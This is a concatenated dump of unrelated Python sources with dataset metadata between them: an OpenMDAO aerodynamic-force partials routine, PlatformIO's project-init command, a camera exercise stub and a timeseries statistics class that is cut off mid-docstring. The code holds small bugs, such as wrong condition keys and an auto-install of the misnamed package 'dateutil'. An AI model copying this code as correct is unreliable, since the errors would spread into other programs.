-fx_total * d_outputs['CM_Y'] / (q_inf * area * c) if 'CM_Z' in d_outputs: d_inputs['moment_center'][0] += -fy_total * d_outputs['CM_Z'] / (q_inf * area * c) d_inputs['moment_center'][1] += fx_total * d_outputs['CM_Z'] / (q_inf * area * c) if 'ref_length' in d_inputs: d_nondim = - 1.0 / (q_inf * area * c**2.0) if 'CM_X' in d_outputs: d_inputs['ref_length'] += m_x * d_nondim * d_outputs['CM_X'] if 'CM_X' in d_outputs: d_inputs['ref_length'] += m_y * d_nondim * d_outputs['CM_Y'] if 'CM_Z' in d_outputs: d_inputs['ref_length'] += m_z * d_nondim * d_outputs['CM_Z'] if 'q_inf' in d_inputs: d_nondim = - 1.0 / (q_inf**2.0 * area) if 'C_X' in d_outputs: d_inputs['q_inf'] += d_outputs['C_X'] * fx_total * d_nondim if 'C_Y' in d_outputs: d_inputs['q_inf'] += d_outputs['C_Y'] * fy_total * d_nondim if 'C_Z' in d_outputs: d_inputs['q_inf'] += d_outputs['C_Z'] * fz_total * d_nondim if 'C_L' in d_outputs: d_inputs['q_inf'] += d_outputs['C_L'] * lift * d_nondim if 'C_D' in d_outputs: d_inputs['q_inf'] += d_outputs['C_D'] * drag * d_nondim if 'CM_X' in d_outputs: d_inputs['q_inf'] += d_outputs['CM_X'] * m_x * d_nondim / c if 'CM_X' in d_outputs: d_inputs['q_inf'] += d_outputs['CM_Y'] * m_y * d_nondim / c if 'CM_Z' in d_outputs: d_inputs['q_inf'] += d_outputs['CM_Z'] * m_z * d_nondim / c if 'x_aero' in d_inputs: nondim = 1.0 / (q_inf * area * c) dm_x = d_outputs['M_X'] if 'M_X' in d_outputs else 0.0 dm_y = d_outputs['M_Y'] if 'M_Y' in d_outputs else 0.0 dm_z = d_outputs['M_Z'] if 'M_Z' in d_outputs else 0.0 dcm_x = d_outputs['CM_X']*nondim if 'CM_X' in d_outputs else 0.0 dcm_y = d_outputs['CM_Y']*nondim if 'CM_Y' in d_outputs else 0.0 dcm_z = d_outputs['CM_Z']*nondim if 'CM_Z' in d_outputs else 0.0 d_inputs['x_aero'][0::3] += -fz * (dm_y + dcm_y) + fy * (dm_z + dcm_z) d_inputs['x_aero'][1::3] += fz * (dm_x + dcm_x) - fx * (dm_z + dcm_z) d_inputs['x_aero'][2::3] += -fy * (dm_x + dcm_x) + fx * (dm_y + dcm_y) if 'f_aero' in d_inputs: if 'F_X' in d_outputs: d_inputs['f_aero'][0::3] += d_outputs['F_X'] if 'F_Y' in d_outputs: d_inputs['f_aero'][1::3] += d_outputs['F_Y'] if 'F_Z' in d_outputs: d_inputs['f_aero'][2::3] += d_outputs['F_Z'] if 'C_X' in d_outputs: d_inputs['f_aero'][0::3] += d_outputs['C_X'] / (q_inf * area) if 'C_Y' in d_outputs: d_inputs['f_aero'][1::3] += d_outputs['C_Y'] / (q_inf * area) if 'C_Z' in d_outputs: d_inputs['f_aero'][2::3] += d_outputs['C_Z'] / (q_inf * area) if 'Lift' in d_outputs: d_inputs['f_aero'][0::3] += -np.sin(aoa) * d_outputs['Lift'] d_inputs['f_aero'][2::3] += np.cos(aoa) * d_outputs['Lift'] if 'Drag' in d_outputs: d_inputs['f_aero'][0::3] += np.cos(aoa) * np.cos(yaw) * d_outputs['Drag'] d_inputs['f_aero'][1::3] += -np.sin(yaw) * d_outputs['Drag'] d_inputs['f_aero'][2::3] += np.sin(aoa) * np.cos(yaw) * d_outputs['Drag'] if 'C_L' in d_outputs: d_inputs['f_aero'][0::3] += -np.sin(aoa) * d_outputs['C_L'] / (q_inf * area) d_inputs['f_aero'][2::3] += np.cos(aoa) * d_outputs['C_L'] / (q_inf * area) if 'C_D' in d_outputs: d_inputs['f_aero'][0::3] += np.cos(aoa) * np.cos(yaw) * d_outputs['C_D'] / (q_inf * area) d_inputs['f_aero'][1::3] += -np.sin(yaw) * d_outputs['C_D'] / (q_inf * area) d_inputs['f_aero'][2::3] += np.sin(aoa) * np.cos(yaw) * d_outputs['C_D'] / (q_inf * area) if 'M_X' in d_outputs: d_inputs['f_aero'][1::3] += -(z-zc) * d_outputs['M_X'] d_inputs['f_aero'][2::3] += (y-yc) * d_outputs['M_X'] if 'M_Y' in d_outputs: d_inputs['f_aero'][0::3] += (z-zc) * d_outputs['M_Y'] d_inputs['f_aero'][2::3] += -(x-xc) * d_outputs['M_Y'] if 'M_Z' in d_outputs: d_inputs['f_aero'][0::3] += -(y-yc) * d_outputs['M_Z'] d_inputs['f_aero'][1::3] += (x-xc) * d_outputs['M_Z'] if 'CM_X' in d_outputs: d_inputs['f_aero'][1::3] += -(z-zc) * d_outputs['CM_X'] / (q_inf * area * c) d_inputs['f_aero'][2::3] += (y-yc) * d_outputs['CM_X'] / (q_inf * area * c) if 'CM_Y' in d_outputs: d_inputs['f_aero'][0::3] += (z-zc) * d_outputs['CM_Y'] / (q_inf * area * c) d_inputs['f_aero'][2::3] += -(x-xc) * d_outputs['CM_Y'] / (q_inf * area * c) if 'CM_Z' in d_outputs: d_inputs['f_aero'][0::3] += -(y-yc) * d_outputs['CM_Z'] / (q_inf * area * c) d_inputs['f_aero'][1::3] += (x-xc) * d_outputs['CM_Z'] / (q_inf * area * c) def check_integrated_surface_force_partials(): nnodes = 3 prob = om.Problem() ivc = om.IndepVarComp() ivc.add_output('aoa',val=45.0, units='deg') ivc.add_output('yaw',val=135.0, units='deg') ivc.add_output('ref_area',val=0.2) ivc.add_output('moment_center',shape=3,val=np.zeros(3)) ivc.add_output('ref_length', val = 3.0) ivc.add_output('q_inf',val=10.0) ivc.add_output('x_aero',shape=3*nnodes,val=np.random.rand(3*nnodes),distributed=True) ivc.add_output('f_aero',shape=3*nnodes,val=np.random.rand(3*nnodes),distributed=True) prob.model.add_subsystem('ivc',ivc,promotes_outputs=['*']) prob.model.add_subsystem('forces',IntegratedSurfaceForces(), promotes_inputs=['*']) prob.setup(force_alloc_complex=True) prob.run_model() prob.check_partials(compact_print=True, method='cs') if __name__ == '__main__': check_integrated_surface_force_partials()
23,629
31
126
7c3b77cba219a97b12762ac1a37f632c5f68d380
11,331
py
Python
platformio/project/commands/init.py
ufo2011/platformio-core
0ceae62701731f8b32c34d7993a34dea34aea59c
[ "Apache-2.0" ]
null
null
null
platformio/project/commands/init.py
ufo2011/platformio-core
0ceae62701731f8b32c34d7993a34dea34aea59c
[ "Apache-2.0" ]
null
null
null
platformio/project/commands/init.py
ufo2011/platformio-core
0ceae62701731f8b32c34d7993a34dea34aea59c
[ "Apache-2.0" ]
null
null
null
# Copyright (c) 2014-present PlatformIO <contact@platformio.org> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # pylint: disable=line-too-long,too-many-arguments,too-many-locals import json import os import click from platformio import fs from platformio.package.commands.install import install_project_dependencies from platformio.package.manager.platform import PlatformPackageManager from platformio.platform.exception import UnknownBoard from platformio.project.config import ProjectConfig from platformio.project.generator import ProjectGenerator from platformio.project.helpers import is_platformio_project @click.command("init", short_help="Initialize a project or update existing") @click.option( "--project-dir", "-d", default=os.getcwd, type=click.Path( exists=True, file_okay=False, dir_okay=True, writable=True, resolve_path=True ), ) @click.option("-b", "--board", multiple=True, metavar="ID", callback=validate_boards) @click.option("--ide", type=click.Choice(ProjectGenerator.get_supported_ides())) @click.option("-e", "--environment", help="Update existing environment") @click.option("-O", "--project-option", multiple=True) @click.option("--env-prefix", default="") @click.option("--no-install-dependencies", is_flag=True) @click.option("-s", "--silent", is_flag=True)
31.828652
119
0.662519
# Copyright (c) 2014-present PlatformIO <contact@platformio.org> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # pylint: disable=line-too-long,too-many-arguments,too-many-locals import json import os import click from platformio import fs from platformio.package.commands.install import install_project_dependencies from platformio.package.manager.platform import PlatformPackageManager from platformio.platform.exception import UnknownBoard from platformio.project.config import ProjectConfig from platformio.project.generator import ProjectGenerator from platformio.project.helpers import is_platformio_project def validate_boards(ctx, param, value): # pylint: disable=W0613 pm = PlatformPackageManager() for id_ in value: try: pm.board_config(id_) except UnknownBoard: raise click.BadParameter( "`%s`. Please search for board ID using `platformio boards` " "command" % id_ ) return value @click.command("init", short_help="Initialize a project or update existing") @click.option( "--project-dir", "-d", default=os.getcwd, type=click.Path( exists=True, file_okay=False, dir_okay=True, writable=True, resolve_path=True ), ) @click.option("-b", "--board", multiple=True, metavar="ID", callback=validate_boards) @click.option("--ide", type=click.Choice(ProjectGenerator.get_supported_ides())) @click.option("-e", "--environment", help="Update existing environment") @click.option("-O", "--project-option", multiple=True) @click.option("--env-prefix", default="") @click.option("--no-install-dependencies", is_flag=True) @click.option("-s", "--silent", is_flag=True) def project_init_cmd( project_dir, board, ide, environment, project_option, env_prefix, no_install_dependencies, silent, ): is_new_project = not is_platformio_project(project_dir) if is_new_project: if not silent: print_header(project_dir) init_base_project(project_dir) if environment: update_project_env(project_dir, environment, project_option) elif board: update_board_envs(project_dir, board, project_option, env_prefix) # resolve project dependencies if not no_install_dependencies and (environment or board): install_project_dependencies( options=dict( project_dir=project_dir, environments=[environment] if environment else [], silent=silent, ) ) if ide: if not silent: click.echo( "Updating metadata for the %s IDE..." % click.style(ide, fg="cyan") ) with fs.cd(project_dir): config = ProjectConfig.get_instance( os.path.join(project_dir, "platformio.ini") ) config.validate() ProjectGenerator(config, environment, ide, board).generate() if is_new_project: init_cvs_ignore(project_dir) if not silent: print_footer(is_new_project) def print_header(project_dir): if project_dir == os.getcwd(): click.secho("\nThe current working directory ", fg="yellow", nl=False) try: click.secho(project_dir, fg="cyan", nl=False) except UnicodeEncodeError: click.secho(json.dumps(project_dir), fg="cyan", nl=False) click.secho(" will be used for the project.", fg="yellow") click.echo("") click.echo("The next files/directories have been created in ", nl=False) try: click.secho(project_dir, fg="cyan") except UnicodeEncodeError: click.secho(json.dumps(project_dir), fg="cyan") click.echo("%s - Put project header files here" % click.style("include", fg="cyan")) click.echo( "%s - Put here project specific (private) libraries" % click.style("lib", fg="cyan") ) click.echo("%s - Put project source files here" % click.style("src", fg="cyan")) click.echo( "%s - Project Configuration File" % click.style("platformio.ini", fg="cyan") ) def print_footer(is_new_project): if is_new_project: return click.secho( "\nProject has been successfully initialized! Useful commands:\n" "`pio run` - process/build project from the current directory\n" "`pio run --target upload` or `pio run -t upload` " "- upload firmware to a target\n" "`pio run --target clean` - clean project (remove compiled files)" "\n`pio run --help` - additional information", fg="green", ) return click.secho( "Project has been successfully updated!", fg="green", ) def init_base_project(project_dir): with fs.cd(project_dir): config = ProjectConfig() config.save() dir_to_readme = [ (config.get("platformio", "src_dir"), None), (config.get("platformio", "include_dir"), init_include_readme), (config.get("platformio", "lib_dir"), init_lib_readme), (config.get("platformio", "test_dir"), init_test_readme), ] for (path, cb) in dir_to_readme: if os.path.isdir(path): continue os.makedirs(path) if cb: cb(path) def init_include_readme(include_dir): with open(os.path.join(include_dir, "README"), mode="w", encoding="utf8") as fp: fp.write( """ This directory is intended for project header files. A header file is a file containing C declarations and macro definitions to be shared between several project source files. You request the use of a header file in your project source file (C, C++, etc) located in `src` folder by including it, with the C preprocessing directive `#include'. ```src/main.c #include "header.h" int main (void) { ... } ``` Including a header file produces the same results as copying the header file into each source file that needs it. Such copying would be time-consuming and error-prone. With a header file, the related declarations appear in only one place. If they need to be changed, they can be changed in one place, and programs that include the header file will automatically use the new version when next recompiled. The header file eliminates the labor of finding and changing all the copies as well as the risk that a failure to find one copy will result in inconsistencies within a program. In C, the usual convention is to give header files names that end with `.h'. It is most portable to use only letters, digits, dashes, and underscores in header file names, and at most one dot. Read more about using header files in official GCC documentation: * Include Syntax * Include Operation * Once-Only Headers * Computed Includes https://gcc.gnu.org/onlinedocs/cpp/Header-Files.html """, ) def init_lib_readme(lib_dir): with open(os.path.join(lib_dir, "README"), mode="w", encoding="utf8") as fp: fp.write( """ This directory is intended for project specific (private) libraries. PlatformIO will compile them to static libraries and link into executable file. The source code of each library should be placed in a an own separate directory ("lib/your_library_name/[here are source files]"). For example, see a structure of the following two libraries `Foo` and `Bar`: |--lib | | | |--Bar | | |--docs | | |--examples | | |--src | | |- Bar.c | | |- Bar.h | | |- library.json (optional, custom build options, etc) https://docs.platformio.org/page/librarymanager/config.html | | | |--Foo | | |- Foo.c | | |- Foo.h | | | |- README --> THIS FILE | |- platformio.ini |--src |- main.c and a contents of `src/main.c`: ``` #include <Foo.h> #include <Bar.h> int main (void) { ... } ``` PlatformIO Library Dependency Finder will find automatically dependent libraries scanning project source files. More information about PlatformIO Library Dependency Finder - https://docs.platformio.org/page/librarymanager/ldf.html """, ) def init_test_readme(test_dir): with open(os.path.join(test_dir, "README"), mode="w", encoding="utf8") as fp: fp.write( """ This directory is intended for PlatformIO Test Runner and project tests. Unit Testing is a software testing method by which individual units of source code, sets of one or more MCU program modules together with associated control data, usage procedures, and operating procedures, are tested to determine whether they are fit for use. Unit testing finds problems early in the development cycle. More information about PlatformIO Unit Testing: - https://docs.platformio.org/en/latest/advanced/unit-testing/index.html """, ) def init_cvs_ignore(project_dir): conf_path = os.path.join(project_dir, ".gitignore") if os.path.isfile(conf_path): return with open(conf_path, mode="w", encoding="utf8") as fp: fp.write(".pio\n") def update_board_envs(project_dir, board_ids, project_option, env_prefix): config = ProjectConfig( os.path.join(project_dir, "platformio.ini"), parse_extra=False ) used_boards = [] for section in config.sections(): cond = [section.startswith("env:"), config.has_option(section, "board")] if all(cond): used_boards.append(config.get(section, "board")) pm = PlatformPackageManager() modified = False for id_ in board_ids: board_config = pm.board_config(id_) if id_ in used_boards: continue used_boards.append(id_) modified = True envopts = {"platform": board_config["platform"], "board": id_} # find default framework for board frameworks = board_config.get("frameworks") if frameworks: envopts["framework"] = frameworks[0] for item in project_option: if "=" not in item: continue _name, _value = item.split("=", 1) envopts[_name.strip()] = _value.strip() section = "env:%s%s" % (env_prefix, id_) config.add_section(section) for option, value in envopts.items(): config.set(section, option, value) if modified: config.save() def update_project_env(project_dir, environment, project_option): if not project_option: return config = ProjectConfig( os.path.join(project_dir, "platformio.ini"), parse_extra=False ) section = "env:%s" % environment if not config.has_section(section): config.add_section(section) for item in project_option: if "=" not in item: continue _name, _value = item.split("=", 1) config.set(section, _name.strip(), _value.strip()) config.save()
9,248
0
252
c91b624711d1778d78556d13356f05fa1dcaaef7
701
py
Python
exercise_monitoring_camera.py
Guvalif/aidor-acceleration-02
afa7aa45bf26f1c2b7f189b6320599357f1e17d3
[ "MIT" ]
1
2018-08-20T02:14:24.000Z
2018-08-20T02:14:24.000Z
exercise_monitoring_camera.py
Guvalif/imedio_0801
afa7aa45bf26f1c2b7f189b6320599357f1e17d3
[ "MIT" ]
null
null
null
exercise_monitoring_camera.py
Guvalif/imedio_0801
afa7aa45bf26f1c2b7f189b6320599357f1e17d3
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- __author__ = 'Kazuyuki TAKASE' __copyright__ = 'PLEN Project Company Inc, and all authors.' __license__ = 'The MIT License (http://opensource.org/licenses/mit-license.php)' # 外部プログラムの読み込み # ============================================================================= from time import sleep from cv2 import VideoCapture, imwrite from wiringpi import * # 定数定義・初期化処理 # ============================================================================= CAMERA_INDEX = 0 MOTION_PIN = 26 camera = VideoCapture(CAMERA_INDEX) wiringPiSetupGpio() # メインループ # ============================================================================= while True: # これ以降を自分で作成 pass
23.366667
82
0.476462
# -*- coding: utf-8 -*- __author__ = 'Kazuyuki TAKASE' __copyright__ = 'PLEN Project Company Inc, and all authors.' __license__ = 'The MIT License (http://opensource.org/licenses/mit-license.php)' # 外部プログラムの読み込み # ============================================================================= from time import sleep from cv2 import VideoCapture, imwrite from wiringpi import * # 定数定義・初期化処理 # ============================================================================= CAMERA_INDEX = 0 MOTION_PIN = 26 camera = VideoCapture(CAMERA_INDEX) wiringPiSetupGpio() # メインループ # ============================================================================= while True: # これ以降を自分で作成 pass
0
0
0
4cc967e9e9d1ac88abda9c1076b57abe84fc47bc
32,902
py
Python
src/timeseries.py
AmberCrafter/pythonlib_statistic
0fd49283c8dd75c5d1ade064be3318eabf74bdfe
[ "MIT" ]
null
null
null
src/timeseries.py
AmberCrafter/pythonlib_statistic
0fd49283c8dd75c5d1ade064be3318eabf74bdfe
[ "MIT" ]
null
null
null
src/timeseries.py
AmberCrafter/pythonlib_statistic
0fd49283c8dd75c5d1ade064be3318eabf74bdfe
[ "MIT" ]
null
null
null
#!/bin/python3 # if used ubuntu 20.10 or later, interpreter set as #!/bin/python and use pip instead of pip3 # =================================================================== # # platfrom check # dateutil check and import try: from dateutil.relativedelta import relativedelta except: import os,sys,subprocess if os.name=='nt': subprocess.check_call([sys.executable, "-m", "pip", "install", "dateutil"]) elif os.name=='posix': subprocess.check_call([sys.executable, "-m", "pip3", "install", "dateutil"]) else: raise "Unknow platform, please install 'dateutil' by yourself." from dateutil.relativedelta import relativedelta # =================================================================== # # platfrom check # numpy check and import try: import numpy as np except: import os,sys,subprocess if os.name=='nt': subprocess.check_call([sys.executable, "-m", "pip", "install", "numpy"]) elif os.name=='posix': subprocess.check_call([sys.executable, "-m", "pip3", "install", "numpy"]) else: raise "Unknow platform, please install 'numpy' by yourself." import numpy as np # =================================================================== # import datetime from typing import Union class Time(object): ''' storageForward: True -> storage value in starttime <br> storageForward: False -> storage value in endtime ''' @staticmethod @staticmethod def _set_header(data,header=None): ''' only used to format output data ''' # ----------------------------------------------------------- # # here i'm not sure what data type i need to use. # thus, if data=np.array(obj(dict)), then we need # to use data.item() to get the data try: data=data.item() except: pass # ----------------------------------------------------------- # if header!=None: dummy={} for i,head in enumerate(header): if isinstance(data,dict): for key in data.keys(): if i==0: dummy[key]={} dummy[key][head]=data[key][:,i] else: dummy[head]=data[:,i] return dummy return data @staticmethod def _fixTime(time,data,timeStep:dict,zeroPara:dict,storageForward:bool,outputPara_list:list, starttime:datetime.datetime=None,endtime:datetime.datetime=None): # def _fixTime(time,data,timeStep:dict,ratio:int,zeroPara:dict,storageForward:bool,starttime:datetime.datetime=None,endtime:datetime.datetime=None): ''' zeroPara: set start datetime para season enum: 1: spring 2: summer 3: autumn 4: winter ''' minTime = np.nanmin(time) if starttime==None else starttime maxTime = np.nanmax(time) if endtime==None else endtime # get data_value if isinstance(data,dict): if 'mean' in data.keys(): data=data['mean'] if 'season' in timeStep.keys(): dt = relativedelta(months=3) if not storageForward: time+=dt; time+=datetime.timedelta(microseconds=-1) maxTime+=dt if zeroPara!=None: minTime=minTime.replace(**zeroPara) dummy={} for para in outputPara_list: if para=='quartile': dummy['lower']=[] dummy['median']=[] dummy['upper']=[] else: dummy[para]=[] tummy = [] count = [] # deal with perfix date before a new start i = Time._get_season(minTime.month) year = minTime.year if minTime.month!=12 else minTime.year+1 mask=np.where(time<datetime.datetime(year,3*i,1))[0] t,d,c = Time._nofixTime(time[mask],data[mask],parameter='season',outputPara_list=outputPara_list) tummy+=list(t); count+=list(c) for key in dummy.keys(): dummy[key]+=list(d[key]) minTime=datetime.datetime(year,3*i,1) while minTime<=maxTime: if minTime>max(time): break mask=np.where((time>=minTime) & (time<minTime+dt))[0] t,d,c = Time._nofixTime(time[mask],data[mask],parameter='season',outputPara_list=outputPara_list) tummy+=list(t); count+=list(c) for key in dummy.keys(): dummy[key]+=list(d[key]) minTime+=dt else: dt = relativedelta(**timeStep) if not storageForward: time+=dt; time+=datetime.timedelta(microseconds=-1) maxTime+=dt if zeroPara!=None: minTime=minTime.replace(**zeroPara) # if ratio==None: ratio=0 dummy = {} for para in outputPara_list: if para=='quartile': dummy['lower']=[] dummy['median']=[] dummy['upper']=[] else: dummy[para]=[] tummy = [] count = [] while minTime<=maxTime: mask = np.where((time>=minTime) & (time<minTime+dt))[0] if mask.size==0: minTime+=dt; continue tummy.append(minTime) count.append(np.sum(np.isfinite(data[mask]))) if 'mean' in outputPara_list: dummy['mean'].append(np.nanmean(data[mask],axis=0)) if 'std' in outputPara_list: dummy['std'].append(np.nanstd(data[mask],axis=0)) if 'max' in outputPara_list: dummy['max'].append(np.nanmax(data[mask],axis=0)) if 'min' in outputPara_list: dummy['min'].append(np.nanmin(data[mask],axis=0)) if 'maxTime' in outputPara_list: dummy['maxTime'].append(time[mask][np.argmax(data[mask],axis=0)]) if 'maxTime' in outputPara_list: dummy['minTime'].append(time[mask][np.argmin(data[mask],axis=0)]) if 'quartile' in outputPara_list: dummy['lower'].append(np.nanpercentile(data[mask],25,axis=0)) if ('quartile' in outputPara_list) | ('median' in outputPara_list): dummy['median'].append(np.nanpercentile(data[mask],50,axis=0)) if 'quartile' in outputPara_list: dummy['upper'].append(np.nanpercentile(data[mask],75,axis=0)) # dummy.append(np.nanmean(data[mask],axis=0) if count[-1]>=ratio else np.array([np.nan]*len(data[0]))) minTime+=dt dummy = Time._set_ndarray(dummy) return tummy,dummy,count @staticmethod def _nofixTime(time,data,parameter:str,outputPara_list:list): # def _nofixTime(time,data,parameter:str,ratio:int): ''' parameter: set the datetime parameter (second, minute ...etc) will be used to calculate season enum: 1: winter 2: spring 3: summer 4: autumn ''' season_dict = { 1: 'Winter', 2: 'Spring', 3: 'Summer', 4: 'Autumn', } if parameter.lower()=='season': time_para_list = [Time._get_season(val.month) for val in time] else: time_para_list = [eval(f"val.{parameter}") for val in time] time_para_list = np.array(time_para_list) if time_para_list.size==0: return np.array(np.nan),np.array(np.nan),np.array(np.nan) minTime = np.nanmin(time_para_list) maxTime = np.nanmax(time_para_list) # if ratio==None: ratio=0 # get data_value if isinstance(data,dict): if 'mean' in data.keys(): data=data['mean'] dummy = {} for para in outputPara_list: if para=='quartile': dummy['lower']=[] dummy['median']=[] dummy['upper']=[] else: dummy[para]=[] tummy = [] count = [] for i in range(minTime,maxTime+1): mask = np.where(time_para_list==i)[0] tummy.append(i if parameter.lower()!='season' else [time[mask[0]].year,season_dict[i]]) count.append(np.sum(np.isfinite(data[mask]))) if 'mean' in outputPara_list: dummy['mean'].append(np.nanmean(data[mask],axis=0)) if 'std' in outputPara_list: dummy['std'].append(np.nanstd(data[mask],axis=0)) if 'max' in outputPara_list: dummy['max'].append(np.nanmax(data[mask],axis=0)) if 'min' in outputPara_list: dummy['min'].append(np.nanmin(data[mask],axis=0)) if 'maxTime' in outputPara_list: dummy['maxTime'].append(time[mask][np.argmax(data[mask],axis=0)]) if 'maxTime' in outputPara_list: dummy['minTime'].append(time[mask][np.argmin(data[mask],axis=0)]) if 'quartile' in outputPara_list: dummy['lower'].append(np.nanpercentile(data[mask],25,axis=0)) if ('quartile' in outputPara_list) | ('median' in outputPara_list): dummy['median'].append(np.nanpercentile(data[mask],50,axis=0)) if 'quartile' in outputPara_list: dummy['upper'].append(np.nanpercentile(data[mask],75,axis=0)) # dummy.append(np.nanmean(data[mask],axis=0) if count[-1]>=ratio else np.array([np.nan]*len(data[0]))) dummy = Time._set_ndarray(dummy) return tummy,dummy,count @staticmethod def _get_season(month): ''' enum: 1: winter 2: spring 3: summer 4: autumn ''' return (month%12+3)//3 @staticmethod def set_config(self,init:bool=False,**kwargs) -> None: ''' config['storageForward']: save the value at the start time or not<br> config['outputPara_list]: select output parameter [mean,std,max,min] Arguments: init: Is the initialize status? Default is False If set True, will using the init state. **kwargs: Optional, this work only init set false. config: { asDict: bool, storage: bool, fixTime: bool, zeroStart: bool, selfUpdate: bool, outputPara_list: list = [ mean, std, max, min, maxTime, minTime, quartile, median ] } ''' if init==True: self.config = dict( asDict=False, storageForward=True, fixTime=True, zeroStart=True, selfUpdate=True, outputPara_list=['mean','std','mean'] # ['mean','std','max','min','maxTime','minTime','quartile','median'], ) else: for key in kwargs.keys(): self.config[key] = kwargs[key] def input(self,time: Union[list, np.ndarray],data: Union[list, np.ndarray],dtype:object =float, ratio: Union[int, float]=None,header: list=None,starttime:datetime.datetime=None,endtime:datetime.datetime=None) -> str: ''' time <datetime> : input timelist of data <br> data <numerical>: input data array Arguments: time: list of time series data: list of data set depend on time series dtype: convert type of data elements ratio: require of the data numbers(int) or ratio(float) header: export tag of data header starttime: start of the time endtime: end of the time Returns: return 'Successfully' when process success. ''' self.time = np.array(time) self.data = np.array(data,dtype=dtype) self.ratio = ratio self.header = header self.starttime = starttime self.endtime = endtime self.counts = [] return "Successfully" def isrepeat(self) -> bool: ''' Check weather data repeat depend on time. Returns: check there has repeat datetime in the data set. ''' if len(self.time.reshape(-1))==len(set(self.time)): return False else: return True def second(self,ratio: Union[int, float]=None,base: int=1000) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(seconds=1), zeroPara=dict(microsecond=0),storageForward=self.config['storageForward'], outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(seconds=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='second',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def minute(self,ratio: Union[int, float]=None,base: int=60) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(minutes=1), zeroPara=dict(second=0,microsecond=0),storageForward=self.config['storageForward'], outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(minutes=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='minute',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def hour(self,ratio: Union[int, float]=None,base: int=60) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(hours=1) ,zeroPara=dict(minute=0,second=0,microsecond=0),storageForward=self.config['storageForward'], outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(hours=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='hour',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def day(self,ratio: Union[int, float]=None,base: int=24) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure 